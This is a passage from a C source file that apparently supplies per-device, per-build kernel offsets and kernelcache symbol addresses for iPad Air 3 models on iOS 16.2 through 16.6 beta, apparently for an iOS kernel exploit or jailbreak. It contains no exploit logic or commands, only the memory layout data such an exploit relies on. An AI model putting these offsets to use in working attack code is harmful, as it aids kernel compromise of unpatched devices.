.fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2e9208, .kernelcache__gPhysBase = 0xfffffff0078f3fa0, .kernelcache__gPhysSize = 0xfffffff0078f3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f2178, .kernelcache__perfmon_devices = 0xfffffff00a327500, .kernelcache__perfmon_dev_open = 0xfffffff007ea5a88, .kernelcache__ptov_table = 0xfffffff0078a7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a326990, .kernelcache__vm_pages = 0xfffffff0078a3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078a6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a326988, .kernelcache__vn_kqfilter = 0xfffffff007ef463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2f1288, .kernelcache__gPhysBase = 0xfffffff0078f80e0, .kernelcache__gPhysSize = 0xfffffff0078f80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078f62b8, .kernelcache__perfmon_devices = 0xfffffff00a32f500, .kernelcache__perfmon_dev_open = 0xfffffff007ea9c8c, .kernelcache__ptov_table = 0xfffffff0078ab160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a32e990, .kernelcache__vm_pages = 0xfffffff0078a7ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078aa110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a32e988, .kernelcache__vn_kqfilter = 0xfffffff007ef8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Air 3 Wifi // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a225178, .kernelcache__gPhysBase = 0xfffffff00781bc60, .kernelcache__gPhysSize = 0xfffffff00781bc60 + 8, .kernelcache__gVirtBase = 0xfffffff007819e40, .kernelcache__perfmon_devices = 0xfffffff00a260380, .kernelcache__perfmon_dev_open = 0xfffffff007e873ac, .kernelcache__ptov_table = 0xfffffff0077cf248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25f800, .kernelcache__vm_pages = 0xfffffff0077cc080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ed9a44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a267800, .kernelcache__vm_pages = 0xfffffff0077cc0c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2677f8, .kernelcache__vn_kqfilter = 0xfffffff007edda20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a22d178, .kernelcache__gPhysBase = 0xfffffff00781bd48, .kernelcache__gPhysSize = 0xfffffff00781bd48 + 8, .kernelcache__gVirtBase = 0xfffffff007819f28, .kernelcache__perfmon_devices = 0xfffffff00a268380, .kernelcache__perfmon_dev_open = 0xfffffff007e8b398, .kernelcache__ptov_table = 0xfffffff0077cf288, .kernelcache__vm_first_phys_ppnum = 